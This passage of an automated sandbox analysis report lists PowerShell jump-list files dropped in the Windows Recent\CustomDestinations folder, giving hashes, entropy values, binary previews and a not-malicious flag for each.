          Preview:...................................FL..................F.".. ...J.S...C...1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...q.(.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF516e31.TMP (copy)

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.733029659386897
          Encrypted:false
          SSDEEP:48:/NLGDPlEtEHAE+3Cy2pU2UHjukvhkvklCywQZkq8IlHJnSogZoI5kq8IlLnSogZf:VCba3CATikvhkvCCtAR8I+HLR8IsHf
          MD5:21F351F0A2675229A4B0738194F83411
          SHA1:7D46E16562F7F3EA296CD0EF25A9BAB79FB6D246
          SHA-256:402FA5DD9801C6FD0E7668F6F029223C1F82A0B28E34DDD0DA7F054B95E1CDAB
          SHA-512:5CE735FF1B2E1F74A7BEA179861B39BFC36F3313E158C2E56A22F9DB8F196BBB61C704A27F74F99BC30B1F4B8788B63C335B42A9A4ABE57ECC1406858408F822
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...C...1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...q.(.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF51d603.TMP (copy)

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.733029659386897
          Encrypted:false
          SSDEEP:48:/NLGDPlEtEHAE+3Cy2pU2UHjukvhkvklCywQZkq8IlHJnSogZoI5kq8IlLnSogZf:VCba3CATikvhkvCCtAR8I+HLR8IsHf
          MD5:21F351F0A2675229A4B0738194F83411
          SHA1:7D46E16562F7F3EA296CD0EF25A9BAB79FB6D246
          SHA-256:402FA5DD9801C6FD0E7668F6F029223C1F82A0B28E34DDD0DA7F054B95E1CDAB
          SHA-512:5CE735FF1B2E1F74A7BEA179861B39BFC36F3313E158C2E56A22F9DB8F196BBB61C704A27F74F99BC30B1F4B8788B63C335B42A9A4ABE57ECC1406858408F822
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...C...1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...q.(.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF523ba2.TMP (copy)

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.733029659386897
          Encrypted:false
          SSDEEP:48:/NLGDPlEtEHAE+3Cy2pU2UHjukvhkvklCywQZkq8IlHJnSogZoI5kq8IlLnSogZf:VCba3CATikvhkvCCtAR8I+HLR8IsHf
          MD5:21F351F0A2675229A4B0738194F83411
          SHA1:7D46E16562F7F3EA296CD0EF25A9BAB79FB6D246
          SHA-256:402FA5DD9801C6FD0E7668F6F029223C1F82A0B28E34DDD0DA7F054B95E1CDAB
          SHA-512:5CE735FF1B2E1F74A7BEA179861B39BFC36F3313E158C2E56A22F9DB8F196BBB61C704A27F74F99BC30B1F4B8788B63C335B42A9A4ABE57ECC1406858408F822
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...C...1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...q.(.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF52a2d8.TMP (copy)

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.733029659386897
          Encrypted:false
          SSDEEP:48:/NLGDPlEtEHAE+3Cy2pU2UHjukvhkvklCywQZkq8IlHJnSogZoI5kq8IlLnSogZf:VCba3CATikvhkvCCtAR8I+HLR8IsHf
          MD5:21F351F0A2675229A4B0738194F83411
          SHA1:7D46E16562F7F3EA296CD0EF25A9BAB79FB6D246
          SHA-256:402FA5DD9801C6FD0E7668F6F029223C1F82A0B28E34DDD0DA7F054B95E1CDAB
          SHA-512:5CE735FF1B2E1F74A7BEA179861B39BFC36F3313E158C2E56A22F9DB8F196BBB61C704A27F74F99BC30B1F4B8788B63C335B42A9A4ABE57ECC1406858408F822
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...C...1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...q.(.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5309fe.TMP (copy)

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.733029659386897
          Encrypted:false
          SSDEEP:48:/NLGDPlEtEHAE+3Cy2pU2UHjukvhkvklCywQZkq8IlHJnSogZoI5kq8IlLnSogZf:VCba3CATikvhkvCCtAR8I+HLR8IsHf
          MD5:21F351F0A2675229A4B0738194F83411
          SHA1:7D46E16562F7F3EA296CD0EF25A9BAB79FB6D246
          SHA-256:402FA5DD9801C6FD0E7668F6F029223C1F82A0B28E34DDD0DA7F054B95E1CDAB
          SHA-512:5CE735FF1B2E1F74A7BEA179861B39BFC36F3313E158C2E56A22F9DB8F196BBB61C704A27F74F99BC30B1F4B8788B63C335B42A9A4ABE57ECC1406858408F822
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...C...1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...q.(.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF536e27.TMP (copy)

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.733029659386897
          Encrypted:false
          SSDEEP:48:/NLGDPlEtEHAE+3Cy2pU2UHjukvhkvklCywQZkq8IlHJnSogZoI5kq8IlLnSogZf:VCba3CATikvhkvCCtAR8I+HLR8IsHf
          MD5:21F351F0A2675229A4B0738194F83411
          SHA1:7D46E16562F7F3EA296CD0EF25A9BAB79FB6D246
          SHA-256:402FA5DD9801C6FD0E7668F6F029223C1F82A0B28E34DDD0DA7F054B95E1CDAB
          SHA-512:5CE735FF1B2E1F74A7BEA179861B39BFC36F3313E158C2E56A22F9DB8F196BBB61C704A27F74F99BC30B1F4B8788B63C335B42A9A4ABE57ECC1406858408F822
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...C...1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...q.(.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF53d2bd.TMP (copy)

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.733029659386897
          Encrypted:false
          SSDEEP:48:/NLGDPlEtEHAE+3Cy2pU2UHjukvhkvklCywQZkq8IlHJnSogZoI5kq8IlLnSogZf:VCba3CATikvhkvCCtAR8I+HLR8IsHf
          MD5:21F351F0A2675229A4B0738194F83411
          SHA1:7D46E16562F7F3EA296CD0EF25A9BAB79FB6D246
          SHA-256:402FA5DD9801C6FD0E7668F6F029223C1F82A0B28E34DDD0DA7F054B95E1CDAB
          SHA-512:5CE735FF1B2E1F74A7BEA179861B39BFC36F3313E158C2E56A22F9DB8F196BBB61C704A27F74F99BC30B1F4B8788B63C335B42A9A4ABE57ECC1406858408F822
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...C...1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...q.(.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF54382e.TMP (copy)

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.733029659386897
          Encrypted:false
          SSDEEP:48:/NLGDPlEtEHAE+3Cy2pU2UHjukvhkvklCywQZkq8IlHJnSogZoI5kq8IlLnSogZf:VCba3CATikvhkvCCtAR8I+HLR8IsHf
          MD5:21F351F0A2675229A4B0738194F83411
          SHA1:7D46E16562F7F3EA296CD0EF25A9BAB79FB6D246
          SHA-256:402FA5DD9801C6FD0E7668F6F029223C1F82A0B28E34DDD0DA7F054B95E1CDAB
          SHA-512:5CE735FF1B2E1F74A7BEA179861B39BFC36F3313E158C2E56A22F9DB8F196BBB61C704A27F74F99BC30B1F4B8788B63C335B42A9A4ABE57ECC1406858408F822
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...C...1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...q.(.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CXDDYDFRMABXQC2YVI04.temp

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.7306289876506415
          Encrypted:false
          SSDEEP:48:oLHDPlEtEe6+3Cy2pU2OHjukvhkvklCywQZkJ8IlLnSogZoI5kJ8IlLnSogZos1:oPih3CABikvhkvCCtAe8IsHLe8IsHf
          MD5:6502FCD572316BC49BB903BDE153D6D9
          SHA1:50A783AE3C41ED4524E27B75CE9C3F93D98E445C
          SHA-256:CDBACDCA2011C6E0096316545FFB265ABA9D5EABBEF1853E41AF3E54ACB0D34B
          SHA-512:455370F0A15E1502964DCA908C7CFBA7E16001247913AE6E8AF595FCD009974F167C501EFAEFB08348B908CA2D90BC1B04FD50C29D86A42C6A818BF0D19438E0
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...@.M.1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...eP.82.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Y....Windows.@......EW<2.Y......2.....................^...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Y......7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DXUCUQ8F892RWC0EPONW.temp

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.73221504114107
          Encrypted:false
          SSDEEP:48:oLtDPlEtEe6+3Cy2pU2OHjukvhkvklCywQZkq8IlLnSogZoI5kq8IlLnSogZos1:ohih3CABikvhkvCCtAR8IsHLR8IsHf
          MD5:7AFDADCC17A22A21493AC1ECD3301C07
          SHA1:04014C4DBFD1F7053FDB5A53EA3739119B7626AF
          SHA-256:E6D6A851233DC4DECE64E48858E8874D323F6446F0E611AC07A65A1723CD5BB0
          SHA-512:E6BD3F535A0F6D836F63B296D12975BAF4218AF409A381D88C1CE5CC6FA3263F90827C539A1699A3BA6F60159E23C27D7E6F69AE66E5623D73C60CB1A0187137
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...@.M.1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...+...1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Y....Windows.@......EW<2.Y......2.....................^...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Y......7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I86UPN4P7QD73MBINPH2.temp

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.73256613139349
          Encrypted:false
          SSDEEP:48:oL9DPlEtEe6+3Cy2pU2OHjukvhkvklCywQZkq8IlLnSogZoI5kq8IlLnSogZos1:ohih3CABikvhkvCCtAR8IsHLR8IsHf
          MD5:57B3E1C4E69F483912AE90E154101EC1
          SHA1:C340213A698B363CC484C03E295726A13101FB5C
          SHA-256:40A8E08BA88559558F9846FD5FEDE602F74B799C06068D470801CE7A603A6932
          SHA-512:DA23F9064697D6666EA79DAF9EB446DC0A602601D246AA572D9D418C049120CFC94C4F7871205C8C641F82A8F6A956B1E0B92C85A7108BBCC784EEB680DC6634
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...@.M.1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...\.{.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Y....Windows.@......EW<2.Y......2.....................^...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Y......7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K07PGO2TA6OUWY4XJ1PD.temp

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.731756786621176
          Encrypted:false
          SSDEEP:48:oL3SDPlEtEe6+3Cy2pU2OHjukvhkvklCywQZkJ8IlLnSogZoI5kJ8IlLnSogZos1:oTCih3CABikvhkvCCtAe8IsHLe8IsHf
          MD5:48B325D591ABF44449D8EB2A507362B4
          SHA1:6B6FDD4AB46078947037A2FF1D06632144CFA7A5
          SHA-256:122904E45BD7F42AE38FEFF43365A33FC835141D17E4BA017B7D33D17A5A7831
          SHA-512:482DE3AB413388AC3FE5EB3CD13B8F73A8F5F05A2E86746512870E6332C99807F11631408D473A7CB64A6CEF20EE32BB8B8B0EE256D6B2A01D8A11794CF1B753
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...@.M.1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1.....p.2.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Y....Windows.@......EW<2.Y......2.....................^...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Y......7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KNVHWLQJWSZLZJ2A42BZ.temp

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.7327731013118064
          Encrypted:false
          SSDEEP:48:oLFDPlEtEe6+3Cy2pU2OHjukvhkvklCywQZkq8IlLnSogZoI5kq8IlLnSogZos1:oRih3CABikvhkvCCtAR8IsHLR8IsHf
          MD5:C1E2F45416DE99162669282CBEB87448
          SHA1:20482FF3E6582EC57C7C84622FA2F69BF8F04412
          SHA-256:938F57DB01EF8F38239B54CE6A40213BD27885923EAD902BBACEC582E4194D17
          SHA-512:E83DF1AC3EC7188EEE5C252919234CD50FF610C4E8EAE79FD5141C566531CE5CB15B110B84D0FB88672D2B49078923A2332E09BD469FE681BA467698E2221C1A
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...@.M.1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...wk..1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Y....Windows.@......EW<2.Y......2.....................^...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Y......7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QS3QK1M1TC8F04MXKC0O.temp

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.7321094805789055
          Encrypted:false
          SSDEEP:48:oLZtDPlEtEe6+3Cy2pU2OHjukvhkvklCywQZkJ8IlLnSogZoI5kJ8IlLnSogZos1:oVdih3CABikvhkvCCtAe8IsHLe8IsHf
          MD5:FBE5113D33AB64A54CCFA987FD2FFD61
          SHA1:53FE1036A71E53AEDD8226AC868B7ED2EF2C5429
          SHA-256:323978E4747F4FA8CC5BBE9297EA637FFD9031568559E5CC8309A2E14C44932E
          SHA-512:E7BC50DD84A56F141E6F2137CC7359A39A86BB624A7D2D66C07E3E451E63AEE354A62F2A119C8CFF29DB20E5ED4159DEEC3DF36181262D0FEF279ED36C4D86A3
          Malicious:false
